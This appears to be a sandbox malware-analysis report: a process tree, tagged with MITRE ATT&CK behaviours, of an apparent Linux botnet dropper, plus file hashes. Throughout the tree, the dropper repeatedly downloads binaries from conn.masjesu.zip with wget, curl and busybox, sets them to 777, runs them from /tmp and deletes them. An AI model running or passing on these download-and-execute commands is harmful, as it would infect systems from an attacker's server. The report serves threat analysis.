/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb./V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP./BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:951
-
-
/bin/rmrm BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs./W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB./RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe./TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:977
-
-
/bin/chmodchmod 777 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS./1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa./sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:987
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- System Network Configuration Discovery
PID:988
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:991
-
-
/bin/chmodchmod 777 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb./097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:994
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:995
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:998
-
-
/bin/chmodchmod 777 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7./tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:1001
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:1002
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1003
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:1005
-
-
/bin/chmodchmod 777 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG./59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:1008
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97